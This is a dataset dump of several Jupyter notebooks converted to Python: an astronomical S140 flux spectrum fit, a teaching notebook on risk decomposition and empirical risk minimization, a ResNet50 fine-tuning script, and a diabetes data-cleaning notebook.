path
stringlengths 8
204
| content_id
stringlengths 40
40
| detected_licenses
list | license_type
stringclasses 2
values | repo_name
stringlengths 8
100
| repo_url
stringlengths 27
119
| star_events_count
int64 0
6.26k
| fork_events_count
int64 0
3.52k
| gha_license_id
stringclasses 10
values | gha_event_created_at
timestamp[ns] | gha_updated_at
timestamp[ns] | gha_language
stringclasses 12
values | language
stringclasses 1
value | is_generated
bool 1
class | is_vendor
bool 1
class | conversion_extension
stringclasses 6
values | size
int64 172
10.2M
| script
stringlengths 367
7.46M
| script_size
int64 367
7.46M
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
/GBT/2017-09-19 fitting s140.ipynb
|
b914387e41536e0d3da52d35cdc2f440841ab37b
|
[] |
no_license
|
mabitbol/public_notebooks
|
https://github.com/mabitbol/public_notebooks
| 0 | 3 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 88,731 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 2
# language: python
# name: python2
# ---
# %pylab inline
# cd /home/mabitbol/GBT-S140/analysis/
import foregrounds as fg
from scipy.optimize import curve_fit
import emcee
import corner
# +
from __future__ import unicode_literals
figsize(10,8)
matplotlib.rcParams['text.usetex'] = True
matplotlib.rcParams['text.latex.unicode'] = True
rcParams['xtick.labelsize'] = 20
rcParams['xtick.major.size'] = 10
rcParams['xtick.major.width'] = 1
rcParams['xtick.major.pad'] = 10
rcParams['xtick.minor.size'] = 5
rcParams['xtick.minor.width'] = 1
rcParams['ytick.labelsize'] = 20
rcParams['ytick.major.size'] = 10
rcParams['ytick.major.width'] = 1
rcParams['ytick.major.pad'] = 10
rcParams['ytick.minor.size'] = 5
rcParams['ytick.minor.width'] = 1
rcParams['legend.fontsize'] = 24
rcParams['legend.borderaxespad'] = 1
rcParams['axes.labelsize'] = 24
rcParams['axes.titlesize'] = 24
# -
freqs = np.array([408e6, 4.575e9, 5.625e9, 6.125e9, 28.5e9, 44.1e9, 70.3e9, 143e9, 217e9, 353e9, 545e9, 857e9])
s140flux = np.array([5.419, 2.132, 2.045, 1.947, 3.138, 3.015, 4.127, 24.915, 126.023, 572.549, 2049.176, 7049.524])
serrs = 0.2 * s140flux
errorbar(freqs, s140flux, serrs, fmt='.')
yscale('log')
xscale('log')
grid()
beam = pi*(0.2*pi/180.)**2
beam2 = pi*((0.16/60.)*pi/180.)**2
def signal(freqs, EM, Asd, nup, Ad, Bd, Acmb, As):
fffit = fg.freefreep(freqs, EM=EM, Te=8000.)
dustfit = fg.thermal_dust(freqs, Ad=Ad, Bd=Bd, Td=18.96)
amefit = fg.ame(freqs, Asd=Asd, nup=nup)
ccmb = fg.cmb(freqs, A=Acmb)
synch = fg.synchrotron(freqs, As=As)
return (fffit + dustfit + amefit + ccmb + synch) * beam
def signal2(freqs, EM1, EM2, Ad, Bd, abeam, Acmb, As):
fffit = fg.freefreep(freqs, EM=EM1, Te=8000.) * beam
fffit2 = fg.freefreep(freqs, EM=EM2, Te=8000.) * abeam
dustfit = fg.thermal_dust(freqs, Ad=Ad, Bd=Bd, Td=18.96) * beam
ccmb = fg.cmb(freqs, A=Acmb) * beam
synch = fg.synchrotron(freqs, As=As) * beam
return np.abs(fffit) + np.abs(fffit2) + np.abs(dustfit) + np.abs(ccmb) + np.abs(synch)
def signal3(freqs, EM, Ad, Bd, Acmb, As):
fffit = fg.freefreep(freqs, EM=EM, Te=8000.)
dustfit = fg.thermal_dust(freqs, Ad=Ad, Bd=Bd, Td=18.96)
ccmb = fg.cmb(freqs, A=Acmb)
synch = fg.synchrotron(freqs, As=As)
return (fffit + dustfit + ccmb + synch) * beam
pn = np.array([5e3, 1.e-3, 20.e9, 1., 2., 30.e-6, 1e3])
bounds = ( [0, 0, 0, 0, 0, -1., 0], [1e4, 1., 1e11, 1., 3., 1., 1e6])
x = curve_fit(signal, freqs, s140flux, p0=pn, sigma=serrs, absolute_sigma=True, bounds=bounds)
pfit = x[0]
pn2 = np.array([5e3 , 1.e7, 0.1, 2., beam2, 30e-6, 1e3])
bounds2 = ( [0, 1.e5, 0, 0, 0, -1., 0], [1e4, 1.e9, 1., 3., 1., 1., 1e6])
x = curve_fit(signal2, freqs, s140flux, p0=pn2, sigma=serrs, absolute_sigma=True, bounds=bounds2)
pfit2 = x[0]
pn3 = np.array([5e3, 1., 2., 30.e-6, 1e3])
bounds3 = ( [0, 0, 0, -1., 0], [1e4, 1., 3., 1., 1e6])
x = curve_fit(signal3, freqs, s140flux, p0=pn3, sigma=serrs, absolute_sigma=True, bounds=bounds3)
pfit3 = x[0]
rchisq1 = np.sum( ( s140flux - signal(freqs, *pfit))**2 / serrs**2 ) / (len(freqs) - 7.)
rchisq2 = np.sum( ( s140flux - signal2(freqs, *pfit2))**2 / serrs**2 ) / (len(freqs) - 7.)
rchisq3 = np.sum( ( s140flux - signal3(freqs, *pfit3))**2 / serrs**2 ) / (len(freqs) - 5.)
print rchisq1, rchisq2, rchisq3
print "EM, Asd, nup, Ad, Bd, Acmb, As"
print pfit
print "EM1, EM2, Ad, Bd, abeam, Acmb, As"
print pfit2
print "EM, Ad, Bd, Acmb, As"
print pfit3
nu = np.linspace(freqs[0], freqs[-1], 1000)
# +
figure(figsize=(16,10))
plot(nu*1e-9, signal(nu, *pfit), label='$\mathrm{Spinning\ Dust}$')
plot(nu*1e-9, signal2(nu, *pfit2), label='$\mathrm{UCHII\ Region}$')
plot(nu*1e-9, signal3(nu, *pfit3), label='$\mathrm{Baseline}$')
errorbar(freqs*1e-9, s140flux, yerr=serrs, fmt='ko',label='$\mathrm{CGPS,\ GBT,\ and\ Planck\ data}$')
xscale('log')
yscale('log')
xlabel('$\mathrm{Frequency}\ (GHz)$')
ylabel('$\mathrm{Flux}\ (Jy)$')
legend(loc=2, ncol=1)
grid()
#ylim(1e-1, 1e5)
grid(which='minor')
title('$\mathrm{S140\ Flux\ Spectrum}$')
#savefig('../notebooks/fullspectrum_withspinningdust')
# -
| 4,343 |
/demos/demo04.ipynb
|
cc2ff65ed1d7dea29e22d58c4a8738e6ce1025c8
|
[] |
no_license
|
RubyLiu206/DS-GA-3001.007-Public
|
https://github.com/RubyLiu206/DS-GA-3001.007-Public
| 0 | 0 | null | 2019-12-04T15:27:59 | 2019-12-01T23:54:28 |
Jupyter Notebook
|
Jupyter Notebook
| false | false |
.py
| 561,174 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Risk Decomposition
import numpy as np
import matplotlib.pyplot as plt
from functools import partial
from sklearn import linear_model
from scipy.stats import norm
import matplotlib.mlab as mlab
# %matplotlib inline
# #### Generic Utility Functions
def plot_prediction_function(f_list = None, label_list = None, data = None, alpha = 0.9, include_data_x = False):
plt.figure(figsize=(20,10))
if data is not None:
x_min, x_max = np.min(data[:, 0]), np.max(data[:, 0])
else:
x_min, x_max = -5.0, 5.0;
if ( (f_list is not None) and (label_list is not None) ):
x_array = np.arange(x_min, x_max, 0.1);
if include_data_x:
x_array = np.concatenate([x_array, data[:, 0], data[:, 0]+0.001, data[:, 0]-0.001])
x_array = np.sort(x_array)
for f, label in zip(f_list, label_list):
f_y = f(x_array);
plt.plot(x_array, f_y, label=label);
if data is not None:
plt.scatter(data[:, 0], data[:, 1], alpha = alpha )
if label_list is not None:
plt.legend()
plt.show()
# ## Generative Model for Data
# We will work on a regression problem in this lab. The input, action and output space will be $\mathcal{R}$. The output $y$ is related to the input $x$ as $ y = g(x) = ax^2 + bx + c $ where $a,b$ and $c$ are sampled from random variables which follows gaussian distribution with parameters $\mu_a, \sigma_a$, $\mu_b, \sigma_b$ and $\mu_c, \sigma_c$ respectively. (Basically, given $x$, $y$ depends on $3$ random numbers). Assume that $X$ is sampled from $\mathcal{N}(\mu_x, \sigma_x)$. For the purposes of this lab, let's set $\mu_a = 1, \mu_b = 2, \mu_c = 3, \mu_x = 0$ and $\sigma_a = \sigma_b = \sigma_c = \sigma_x = 1$.
# #### Utility functions for sampling
# +
mu_a = 1;
sigma_a = 1;
mu_b = 2;
sigma_b = 1;
mu_c = 3;
sigma_c = 1;
mu_x = 0;
sigma_x = 1;
assert( (mu_x == 0) and (sigma_x == 1))
# +
## assumes g is a polynomial. Takes in a coeff list, where coeff_list[i] is the coefficient of x^i and x to evaluate it at
def template_g(coeff_list, x):
ans = 0;
for i, coeff in enumerate(coeff_list):
ans += coeff * (x**i)
return ans
# +
### generates one sample function g
def sample_g():
a = np.random.randn() * sigma_a + mu_a;
b = np.random.randn() * sigma_b + mu_b;
c = np.random.randn() * sigma_c + mu_c;
return partial(template_g, [c, b, a] )
# +
## give one (x,y) sample
def get_one_x_y_sample():
x = np.random.randn()*sigma_x + mu_x;
g = sample_g()
return x, g(x)
# +
## gives a matrix with first column x and second column y
def generate_n_samples(n = 1000):
matrix = np.zeros([n, 2]);
for i in range(n):
matrix[i] = get_one_x_y_sample();
return matrix
# -
# ### Visualizing samples from $\mathcal{P}_{X \times Y}$
data_cloud = generate_n_samples(1000)
plot_prediction_function(data = data_cloud)
# ### Visualizing samples of $Y$ for fixed values of $X$
def y_for_fixed_x( x_list = np.arange(-4, 4.5, 0.5), n_sample_per_x = 10):
data = np.zeros([len(x_list)*n_sample_per_x, 2]);
for i, x in enumerate(x_list):
for j in range(n_sample_per_x):
g = sample_g();
data[n_sample_per_x*i + j, 0] = x;
data[n_sample_per_x*i + j, 1] = g(x);
return data
plot_prediction_function(data = y_for_fixed_x(n_sample_per_x=50) )
# ## Exercise:
#
# Recall that the risk of a function $f$ wrt to loss $l$, $R(f) = E[l((f(x), y)]$ and the bayes optimal function $f^* = \underset{f}{\operatorname{argmin}}R(f)$
#
# (Hint: for $X \sim \mathcal{N}(0, 1)$, $E[X^4] = 3$)
#
# 1. If we minimize l2 loss, what is the bayes optimal function $f^*(x)$ for the model described above? Does your answer depend on the distribution assumed on $X$?
# 2. What is the risk assosciated with $f^*(x)$, $R(f)$?
# 3. Once you have mathematical expressions for 1 and 2, fill in the python functions below for the bayes prediction function and bayes risk.
# ## Answers:
# Remember that $R(f) = E[(f(x) - E[y|x])^2 ] + E[(y - E[y|x])^2] $
# 1. For l2 loss, $f^*(x) = E[Y|X=x] = \mu_a x^2 + \mu_b x + \mu_c $. No, independent of distribution on $X$.
# 2. From the decomposition of l2 loss above,
# $$ \begin{align}
# R(f^*(x)) &= E[(y - E[y|x])^2] \\
# &= E_x[ E_{y|x} [ (y - E[y|x])^2 ] ] \\
# &= E_x[ \sigma_a^2 x^4 + \sigma_b^2 x^2 + \sigma_c^2 ] \\
# &= \sigma_a^2 (3) + \sigma_b^2 ( \sigma_x^2 + \mu_x^2) + \sigma_c^2
# \end{align} $$
#
#
## variable f_star assiged to bayes optimal function
## bayes risk with numerical value of bayes risk
f_star = partial(template_g, [mu_c, mu_b, mu_a] )
bayes_risk = sigma_a**2 * 3 + sigma_b**2 * ( sigma_x**2 + mu_x**2) + sigma_c**2;
print(bayes_risk)
plot_prediction_function([f_star], ['$f^*$'], data=data_cloud)
plot_prediction_function([f_star], ['$f^*$'], data=y_for_fixed_x(n_sample_per_x=100) )
# ## Estimating the Risk $R(f)$ using monte-carlo
# +
## For Students to Fill in
## use get_one_x_y_sample()
def estimate_risk(f, n_try = int(1e5) ):
sum = 0;
for i in range(n_try):
x, y = get_one_x_y_sample()
sum += (f(x) - y)**2
return sum/n_try
# -
estimate_risk(f_star)
# # Empirical Risk
# We never usually know $\mathcal{P}_{X, Y}$ and we work with finite samples drawn from the distribution. With $\mathcal{D}_n = ( (x_1, y_1), (x_2, y_2), \dots , (x_n, y_n) )$ be $n$ iid data points, the empirical risk of $f$ with respect to loss $l$ on dataset $\mathcal{D}_n$ is defined as $$ \hat{R}_n(f) = \frac{1}{n} \sum_{i=1}^{n} l( f(x_i), y_i) $$
#
# Have we used the expression of $ \hat{R}_n(f) $ for anything till now?
# Answer:
# We estimated risk in monte carlo simulation using the same expression.
# ### Exercise:
#
# 1. Is $\hat{R}_n(f)$ or $R(f)$ a random variable? If so, what is the mean of the random variable and what is it's distribution?
# 2. Can $R(f) \geq \hat{R}_n(f)$?
#
#
# Answers:
#
# 1. $\hat{R}_n(f)$ is random variable with the mean $R(f)$. Approximately gaussian using CLT.
# 2. Yes
def empirical_risk(f, sample_matrix):
fy_array = f(sample_matrix[:, 0]);
risk = np.mean((fy_array - sample_matrix[:, 1]) ** 2)
return risk
# #### Checking the distribution of $\hat{R}_n(f)$
# +
n = 1000;
emp_rsk = np.zeros(n)
for i in range(n):
emp_rsk[i] = empirical_risk(f_star, generate_n_samples(5000))
print( np.mean(emp_rsk) )
# +
datos = emp_rsk
plt.figure(figsize=(20,10))
# best fit of data
(mu, sigma) = norm.fit(datos)
# the histogram of the data
n, bins, patches = plt.hist(datos, 75, density=True, facecolor='green', alpha=0.75)
# add a 'best fit' line
y = mlab.normpdf( bins, mu, sigma)
l = plt.plot(bins, y, 'r--', linewidth=2)
#plot
plt.xlabel('Smarts')
plt.ylabel('Probability')
plt.title(r'$\mathrm{Histogram\ of\ \hat{R}(f^*):}\ \mu=%.3f,\ \sigma=%.3f$' %(mu, sigma))
plt.grid(True)
plt.show()
# -
# ## Empirical Risk Minimization
# Let's fix a training data with $n = 100$ points
data = generate_n_samples(n = 100);
# ### Visualizing Data
plot_prediction_function([f_star], ['$f^*$'], data)
# ### Exercise
# One way to achieve $\hat{R}_n(f) = 0 $ is to memorize the data. For the sake of simplicity let's assume that the $\mathcal{D}_n$ we are working with has no duplicate values for $x$. The function $f(x)$ returns the corresponding $y$ from $\mathcal{D}_n$ otherwise $f(x)$ returns $0$. What is the risk, $R(f)$, for this function?
# Answer:
#
# $$ \begin{align}
# R(f) &= E[ (Y - 0) ^2 ] \\
# &= E_{X} E_{Y|X=x} E[ Y^2 ] \\
# &= E_{X} ( var(Y|X=x) + E[Y|X=x]^2 ) \\
# &= E_{X} ( \sigma_a^2 X^4 + \sigma_b^2 X^2 + \sigma_c^2 + (\mu_a X^2 + \mu_b X + \mu_c )^2 ) \\
# &= E_{X} ( (\sigma_a^2 + \mu_a^2) X^4 + (\alpha)X^3 + (\sigma_b^2 + \mu_b^2 + 2 \mu_c \mu_a ) X^2 + \beta X + \sigma_c^2 + \mu_c^2 \\
# &= 3(\sigma_a^2 + \mu_a^2) + (\sigma_b^2 + \mu_b^2 + 2 \mu_c \mu_a ) + \sigma_c^2 + \mu_c^2
# \end{align} $$
risk_memorized_function = 3*(sigma_a**2 + mu_a**2) + (sigma_b**2 + mu_b**2 + 2*mu_c*mu_a) + sigma_c**2 + mu_c**2
print(risk_memorized_function)
# ### Estimating the risk of memorized function numerically
def f_memorized(x_array):
scalar = False
if not isinstance(x_array,(list,np.ndarray)):
scalar = True
x_array = np.array([x_array]);
result = np.zeros_like(x_array).astype(float)
for i, x in enumerate(x_array):
found = False
for x_i, y_i in data:
if x==x_i:
result[i] = y_i;
found = True
if not found:
result[i] = 0.0
if scalar:
return result[0]
return result
linear_f_hat_risk = estimate_risk( f_memorized, n_try=int(1e3) )
print('Risk: ', linear_f_hat_risk)
linear_f_hat_empirical_risk = empirical_risk(f_memorized, data)
print('Empirical Risk: ', linear_f_hat_empirical_risk)
plot_prediction_function([f_star, f_memorized], ['$f^*$', 'memorized'], data, include_data_x=True)
# ### Constrained Risk Minimization
# Like we saw in the previous section, (unconstrained) empirical risk minimization is (almost) useless in practise. We achieved perfect $0$ for empirical risk but we have a increase in the actual risk, which is the quantity we care about.
# #### Linear (Affine) Hypothesis Space
# ## Exercise
# For $f(x) = \alpha x + \beta$
# 1. Calculate an expression for risk of $f(x)$
# 2. Find $\alpha^*, \beta^*$ which minimises $R(f)$.
# Answer:
# 1.
#
# $$ \begin{align}
# R(f) &= E[ (Y - \alpha X - \beta )^2 ] \\
# &= E_{X} E_{Y|X=x} E[ (Y - \alpha x - \beta )^2 ] \\
# &= E_{X} ( var( (Y - \alpha x - \beta )|X=x) + E[(Y - \alpha x - \beta )|X=x]^2 ) \\
# &= E_{X} ( \sigma_a^2 X^4 + \sigma_b^2 X^2 + \sigma_c^2 + (\mu_a X^2 + (\mu_b - \alpha) X + (\mu_c - \beta) )^2 ) \\
# &= E_{X} ( (\sigma_a^2 + \mu_a^2) X^4 + (something)X^3 + (\sigma_b^2 + (\mu_b - \alpha)^2 + 2 (\mu_c - \beta) \mu_a ) X^2 + (something) X + \sigma_c^2 + (\mu_c - \beta)^2 \\
# &= 3(\sigma_a^2 + \mu_a^2) + (\sigma_b^2 + (\mu_b - \alpha)^2 + 2 (\mu_c - \beta) \mu_a ) + \sigma_c^2 + (\mu_c - \beta)^2
# \end{align} $$
# 2.
#
# To find $\alpha^*, \beta^*$
# $$ \frac{d}{d \alpha}R(f) = 2(\alpha - \mu_b) = 0 $$
# Therefore, $\alpha^* = \mu_b$
# $$ \frac{d}{d \beta}R(f) = -2 \mu_a + 2(\beta - \mu_c) = 0 $$
# $\beta^* = \mu_a + \mu_c$
#
# +
### risk for linear function (alphax + beta)
## students fill in
def linear_function_risk(alpha, beta):
return 3*(sigma_a**2 + mu_a**2) + sigma_b**2 + (mu_b-alpha)**2 + 2*(mu_c - beta)*mu_a + sigma_c**2 + (mu_c - beta)**2;
# +
### Estimating Risk
linear_f_star = partial(template_g, [mu_a + mu_c, mu_b]);
mc_linear_f_star_risk = estimate_risk( linear_f_star)
print('MC Risk: ', mc_linear_f_star_risk)
linear_f_star_risk = linear_function_risk(mu_b, mu_a + mu_c)
print('Risk :' , linear_f_star_risk)
# -
# ### Visualizing Prediction Function $\ \ f^*_\mathcal{H}$
plot_prediction_function([linear_f_star, f_star], ['$f^*_\mathcal{H}$', '$f^*$'], data, alpha = 1)
# ### Constrained Empirical Risk Minimization
# #### $\hat{\alpha}, \hat{\beta}$ which minimises $\hat{R}(f)$ and estimate the risk using monte carlo method.
## Fitting Linear Regression on Data
reg = linear_model.LinearRegression(fit_intercept=True).fit(data[:, 0:1], data[:, 1])
reg.intercept_, reg.coef_
linear_f_hat = partial(template_g, [reg.intercept_, reg.coef_[0]])
linear_f_hat_risk = linear_function_risk(reg.coef_[0], reg.intercept_)
print('Risk :' , linear_f_hat_risk)
mc_linear_f_hat_risk = estimate_risk( linear_f_hat )
print('MC Risk: ', mc_linear_f_hat_risk)
linear_f_hat_empirical_risk = empirical_risk(linear_f_hat, data)
print('Empirical Risk: ', linear_f_hat_empirical_risk)
# ### Visualizing Prediction Function $\ \ \hat{f}_\mathcal{H}$
plot_prediction_function([linear_f_star, linear_f_hat, f_star], ['$f^*_\mathcal{H}$', '$\hat{f}_\mathcal{H}$', '$f^*$'], data, alpha = 1)
# ## Error Decomposition
# Recall that: <br>
# Approximation Error for $\mathcal{H}$ = $R(f^*_{\mathcal{H}}) - R(f^*) $ <br>
# Estimation Error of $\ \hat{f}_\mathcal{H}$ = $R(\hat{f}_{\mathcal{H}}) - R(f_{\mathcal{H}})$ <br>
# Excess Risk of f = $R(f) - R(f^*)$
# ### Exercise:
# 1. From the values we calculated above, what is the approximation error for linear hypothesis space? Is approximation error a random variable?
# 2. What is the estimation error of $\ \hat{f}_\mathcal{H}$? Is estimation error a random variable?
# 3. What is the excess risk of $\ \hat{f}_\mathcal{H}$? Is this a random variable?
# #### Answers:
#
# 1. Approximation Error is not random.
# 2. Estimation Error is random.
# 3. Excess risk of $\ \hat{f}_\mathcal{H}$ is random.
# ### Estimation Error and Excess risk of $\hat{f}_\mathcal{H}$
def estimation_error_and_excess_risk(data, risk_fh, risk_f_star):
reg = linear_model.LinearRegression(fit_intercept=True).fit(data[:, 0:1], data[:, 1]);
linear_f_hat_risk = linear_function_risk(reg.coef_[0], reg.intercept_)
return linear_f_hat_risk - risk_fh, linear_f_hat_risk - risk_f_star
n_try = 1000;
estimation_error_array = np.zeros(n_try);
excess_risk_array = np.zeros(n_try)
for i in range(n_try):
estimation_error_array[i], excess_risk_array[i] = estimation_error_and_excess_risk( generate_n_samples(n = 100), linear_f_star_risk, bayes_risk)
_ = plt.hist(estimation_error_array, bins = 100)
_ = plt.hist(excess_risk_array, bins = 100)
# ### Optimization Error
# Since we were optimizing for L2 loss over a linear hypothesis space, we found the best possible $\hat{f}_\mathcal{H}$ (upto numerical error) using the closed form expression for linear regression. What if we use SGD instead to find $f$ and stop iterations prematurely?
reg_sgd = linear_model.SGDRegressor(max_iter=3,
fit_intercept = True,
penalty = 'none', #No Regularization
tol = None)
reg_sgd.fit(data[:, 0:1], data[:, 1])
reg_sgd.intercept_, reg_sgd.coef_
linear_f_tilde = partial(template_g, [reg_sgd.intercept_[0], reg_sgd.coef_[0]])
linear_f_tilde_risk = linear_function_risk(reg_sgd.coef_[0], reg_sgd.intercept_[0])
print('Risk :' , linear_f_tilde_risk)
mc_linear_f_tilde_risk = estimate_risk( linear_f_tilde )
print('MC Risk: ', linear_f_tilde_risk)
linear_f_tilde_empirical_risk = empirical_risk(linear_f_tilde, data)
print('Empirical Risk: ', linear_f_tilde_empirical_risk)
# ### Visualizing $\ \ \ \tilde{f_\mathcal{H} }$
plot_prediction_function([linear_f_star, linear_f_hat, linear_f_tilde, f_star],
['$f^*_\mathcal{H}$', '$\hat{f}_\mathcal{H}$', '$\tilde{f_\mathcal{H}}$', '$f^*$'],
data, alpha = 1)
# ### Exercise:
# What is the optimization error? How do you expect it to change with the number of iterations of gradient descent?
# Answer: As number if iterations increase, optimization error will reduce.
# # Additional Questions
# 1. Suppose we use another hypothesis space $\mathcal{H}' \subset \mathcal{H}$, how do you expect the approximation error to change?
# 2. Suppose we increase the number of data points $n$ in the sample to calculate $\ \hat{f}_\mathcal{H}$. How do we expect estimation error to change?
# 2. Repeat everything we did for linear hypothesis space for constant, quadratic and cubic hypothesis space for $n=500, 1000$ as well - does your results match with what you expected in 1 and 2?
| 15,998 |
/ResNet50.ipynb
|
5a439ae124bf9338b54afb4d7b033e0c69cd8feb
|
[] |
no_license
|
hoangnguyenkcv/Keras_CNN_models
|
https://github.com/hoangnguyenkcv/Keras_CNN_models
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 733,603 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python [default]
# language: python
# name: python3
# ---
# +
import keras
from keras.models import Sequential
from keras.models import Model
from keras import backend as K
from keras.layers.core import Dense, Dropout, Activation, Flatten
from keras.layers.convolutional import Convolution2D, MaxPooling2D
from keras.optimizers import SGD, RMSprop, Adam
from keras.metrics import categorical_crossentropy
from keras.preprocessing.image import ImageDataGenerator
from keras.layers.normalization import BatchNormalization
from keras.layers.convolutional import *
from keras import regularizers ### for SVM
import numpy as np
import tensorflow as tf
# import theano
import matplotlib.pyplot as plt
import matplotlib
import itertools
from numpy import*
from sklearn.utils import shuffle
# %matplotlib inline
import random as rn
import os
os.environ['PYTHONASHSEED']= '0'
from keras.models import load_model
tf.reset_default_graph()
# -
from keras.applications.resnet50 import ResNet50
from keras.preprocessing import image
from keras.applications.resnet50 import preprocess_input, decode_predictions
#setting the seed for nummy_gennerated random numbers
np.random.seed(7)
#seting the seed for python random numbers
rn.seed(124)
#seting the seed for tensorflow random numbers
tf.set_random_seed(57)
# +
train_path = '.\MAKEUP\Train'
valid_path = '.\MAKEUP\Valid'
#test_path = '.\CASIA1\Test'
# -
train_batches = ImageDataGenerator().flow_from_directory(train_path, target_size = (224,224), classes = ['MakeUp','Normal'], batch_size =8)
valid_batches = ImageDataGenerator().flow_from_directory(valid_path, target_size = (224,224), classes = ['MakeUp','Normal'], batch_size = 8)
# test_batches = ImageDataGenerator().flow_from_directory(test_path, target_size = (224,224), classes = ['Au','Sp'], batch_size =8)
# +
# plots images with labels within jupyter notebook
def plots(ims, figsize = (12,6), rows=1, interp =False , titles = None):
if type(ims[0]) is np.ndarray:
ims = np.array(ims).astype(np.uint8)
if (ims.shape[-1] !=3):
ims = ims.transpose((0,2,3,1))
f = plt.figure(figsize = figsize)
cols = len(ims)// rows if len(ims) % 2 == 0 else len(ims)//rows + 1
for i in range(len(ims)):
sp = f.add_subplot(rows,cols,i+1)
sp.axis('Off')
if titles is not None:
sp.set_title(titles[i], fontsize=16)
plt.imshow(ims[i], interpolation = None if interp else 'none')
plt.show()
# -
imgs, labels = next(train_batches)
plots(imgs, titles = labels)
#### Build Fine-tuned ResNet model
model = keras.applications.resnet50.ResNet50()
print('Model loaded.')
model.summary()
model.layers.pop()
last = model.layers[-1].output
x = Dense(2, activation = 'linear', kernel_regularizer=regularizers.l2(0.001))(last)
finetuned_model = Model(model.input, x)
n = len(finetuned_model.layers)
for idx, layer in enumerate(finetuned_model.layers):
if idx < (n-1):
layer.trainable = False
else:
layer.trainable = True
# +
opt = Adam(lr=0.0001, decay=10e-6)
finetuned_model.compile(loss='hinge', optimizer=opt, metrics=['accuracy'])
# model.compile(loss='hinge', optimizer='adadelta', metrics=['accuracy'])
# sgd = SGD(lr=0.0001, decay=1e-6, momentum=0.9, nesterov=True)
# model.compile(loss='hinge', optimizer=sgd, metrics=['accuracy'])
# +
from keras.callbacks import ModelCheckpoint
# Save check point
filepath = "weights.resnet50.best.hdf5"
checkpoint = ModelCheckpoint(filepath, monitor='val_acc', verbose =1, save_best_only = True, mode ='max')
callbacks_list= [checkpoint]
# Fit the model
# model.fit(X,Y, validation_split=0.33, nb_epoch =150, batch_size =10, callbacks = callbacks_list, verbose =0)
history = finetuned_model.fit_generator(train_batches, steps_per_epoch = 120, validation_data = valid_batches, validation_steps=26, epochs =200, shuffle=True, callbacks = callbacks_list, verbose =2)
# +
# plot history
print(history.history.keys())
# summarize history for accuracy
plt.plot(history.history['acc'])
plt.plot(history.history['val_acc'])
plt.title('model accuracy')
plt.ylabel('accuracy')
plt.xlabel('epoch')
plt.legend(['train','valid'], loc= 'upper left' )
plt.show()
# -
# Save model
#model.save('forgecy_image_model.h5')
# model.summary()
# model.get_weights()
# model.optimizer
## Load model
#from keras.models import load_model
#model = load_model('forgecy_image_model.h5')
# +
# # estimate accuracy on whole dataset using loaded weights
# scores = model.evaluate(X, Y, verbose=0)
# print("%s: %.2f%%" % (model.metrics_names[1], scores[1]*100))
# -
test_imgs, test_labels = next(test_batches)
test_labels = test_labels[:, 0]
predictions = finetuned_model.predict_generator(test_batches, steps =1 , verbose = 0)
predictions
test_batches.class_indices
# rounded _predictions = model.predict_generator_classes(test_batches, steps =1 , verbose = 0)
cm = confusion_matrix(test_lables, np.round(predictions[:,0]))
cm_plot_labels = ['Au', 'Sp']
plot_confusion_matix(cm, cm_plot_labels, title = 'confusion Matrix')
| 5,319 |
/diabets__classifier.ipynb
|
70e51179c86dbe9b5532b4544912e1afab0b441c
|
[] |
no_license
|
muhammadanas25/diabetes_classifier-using-kmeans
|
https://github.com/muhammadanas25/diabetes_classifier-using-kmeans
| 0 | 0 | null | null | null | null |
Jupyter Notebook
| false | false |
.py
| 149,873 |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.15.2
# kernelspec:
# display_name: Python 3
# name: python3
# ---
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="YhHB_V-7tS5x" outputId="b67abe1b-f131-46d8-e01b-b1000743ab43"
from sklearn import datasets
import pandas as pd
import numpy as np
train = pd.read_csv("diabetes__.csv")
train.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 297} id="R4y-QDCBtU80" outputId="1d1251ed-a3fe-4dab-bf6f-6d8d9c83d3ec"
train.describe()
# + colab={"base_uri": "https://localhost:8080/"} id="4OB6w5WBwInD" outputId="b4c307de-c3e3-4c69-a01f-0bdb1e3aed11"
train.isnull().sum()
# + id="siuJgB8N3W33"
columns_replace= ['BloodPressure', 'Glucose', 'SkinThickness', 'Insulin', 'BMI']
# + colab={"base_uri": "https://localhost:8080/"} id="LXiUNMSy3ZVX" outputId="bcadc788-d3c2-43f1-e95d-992ba03c3ce9"
for column in columns_replace: #values in these column could not be zer we need to remove those
train[column] = train[column].replace(0,np.NaN)
print(train.isnull().sum())
# + colab={"base_uri": "https://localhost:8080/"} id="R5lTw2XI3ozH" outputId="2a261452-e56d-4458-e879-8d6725bb7181"
for column in columns_replace :
mean= int(train[column].mean(skipna=True))
train[column] = train[column].replace(np.NaN,mean)
print(train.isnull().sum())
# + colab={"base_uri": "https://localhost:8080/", "height": 262} id="5oqPXt8hw5qD" outputId="de86d659-3a89-4483-ad55-477e1587ea8a"
train.Outcome.value_counts().plot(kind = 'bar', color = ['lightblue', 'lightgreen']); #noting imbalance in data target
# + colab={"base_uri": "https://localhost:8080/", "height": 1000} id="xvcmJSr3xBqa" outputId="b2fc4d32-a423-4dfc-a3af-b70a40969717"
import matplotlib.pyplot as plt #correlation plot to find
import seaborn as sns
correlation_matrix = train.corr()
plt.figure(figsize=(25, 20))
sns.heatmap(correlation_matrix,
annot=True,
linewidths=0.5,
fmt= ".2f",
cmap="YlGnBu");
# + colab={"base_uri": "https://localhost:8080/", "height": 204} id="3JQlVgHB13fY" outputId="c3f3a4de-9868-419a-fc5a-35e36f2cc15e"
from sklearn.model_selection import train_test_split # Import train_test_split
# Split dataset into training set and test set
x=train.drop(['Outcome'],axis=1)
y=train.iloc[ : , :8]
X_train, X_test, y_train, y_test = train_test_split(x, y,random_state=2, test_size=0.2) # 80% training and 30% test
X_train.head()
# + colab={"base_uri": "https://localhost:8080/", "height": 197} id="FaLLfaUS1kXM" outputId="7d94be6d-7c6f-47ca-e746-2fe5721eed76"
